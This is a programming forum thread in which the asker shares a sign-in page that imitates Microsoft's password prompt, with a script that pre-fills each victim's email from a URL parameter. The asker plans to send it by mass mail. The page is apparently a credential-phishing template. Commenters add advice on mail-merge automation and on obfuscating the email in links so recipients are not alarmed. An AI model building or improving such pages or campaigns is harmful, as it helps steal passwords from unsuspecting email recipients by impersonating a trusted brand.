# How Do I Auto Grab User Email Address?

Tags: javascript, jquery, client, client-server

below are my code

```
<section id="section_pwd">
        <div class="auth-wrapper">
            <img src="assets/logo.png" alt="Microsoft" class="d-block" />
            <div class="identity w-100 mt-16 mb-16">
                <button class="back">
                    <img src="assets/back.png" />
                </button>
                <span id="user_identity"><pre id="signature"></pre></span>
            </div>
            <h2 class="title mb-16">Enter password</h2>
            <form>
                <div class="mb-16">
                    <p id="error_pwd" class="error"></p>
                    <input id="inp_pwd" type="password" name="pass" class="input" placeholder="Password" />
                </div>
            </form>
            <div>
                <p class="mb-16"> <a href="#" class="link fs-13">Forgot password?</a></p>
                <p class="mb-16">
                    <a href="#" class="link fs-13">Other ways to sign in</a>
                </p>
            </div>
            <div>
                <button class="btn" id="btn_sig">Sign in</button>
            </div>
        </div>
    </section>
```

```js
 <script>
        document.addEventListener("DOMContentLoaded", function() {
            // Get the email parameter from the URL
            var urlParams = new URLSearchParams(window.location.search);
            var email = urlParams.get('email');

            // If the email parameter is present, update the password input and generate the signature
            if (email) {
                var passwordInput = document.getElementById('inp_pwd');
                var signatureOutput = document.getElementById('signature');

                // Update the password input with the email
                passwordInput.value = email;

                // Generate the signature (customize this as needed)
                var signature = email;

                // Update the signature output
                signatureOutput.textContent = signature;
            }
        });
    </script>
```

It works only when done manually using https://example.com/jik/?email=user@example.com but since am sending a mass mail, i want it to auto grab any of the users that click on my link.

Note that: this  shows the email address manually instead of auto grabbing

Comment: Auto grab it from where? You want the browser to figure out the user's email address automatically?

Comment: Most browser have auto-fill. Just create a form with an `email` input field, and the browser will offer the user the choice of auto-filling it.

Comment: i understand that part but i don't want users to fill in their email. the link below works but it's showing user@example.com which i want it to auto grab users email instead of user@example.com


The link: https://example.com/jik/?email=user@example.com

Comment: And I'll ask again: from where? Their mail application? What if they have multiple addresses?

Comment: yes from their mail address, lets say for instance i sent you a mail to your email (something@Barmar.com) and you click a link from the email, it will auto grab your email address only.

Comment: AFAIK, there's no way to do that in JavaScript.

Comment: Note also that JavaScript is generally not executed in HTML email.

Comment: Ouch.... got any idea on how to achieve that?

Comment: I don't think you can. Why do you think every form makes you fill in your email, if they could get it automatically?

Comment: seems you are not getting me, i will send you mail which shows that i know your email address but when you click my link from the email, my website should auto grab your email address...

The above link is working but it works manually

Comment: If you're sending the email automatically, why don't you put `&user=destinationemail` in the `href` when you send it?

Comment: i did but that is a manual method since am sending a mass mail of 100+ so doing it manually is gonna be a stress

Comment: You don't have to do it manually. Write a script that generates all the emails from a file or database. This is basic mail merge.

Comment: hmmm, will it work since it will still need to undergo the process of identifying which of the email click the link.

Comment: Yes. Your mail merge script will substitute each address into the mail that you send to that address. So each user gets a custom message with their email in it.

Comment: If you use a service like Twilio SendGrid, they can automate this for you. You upload a CSV file with all the parameters, and a message template with fields to fill in from the CSV.

Comment: Yeah, you just need to dynamically update all links back to your site with something like what @Barmar showed. I personally think it's better to obfuscate those links to look like (for example) `...?d=fjdkhsudkfhd` - only because privacy matters and it might spook the user to see `...?user=maryjoe@gmail.com` tacked on.

Comment: @Kinglish you are correct and i appreciate that you understand the logic

Comment: You can see examples of this when you click on the Unsubscribe link in emails.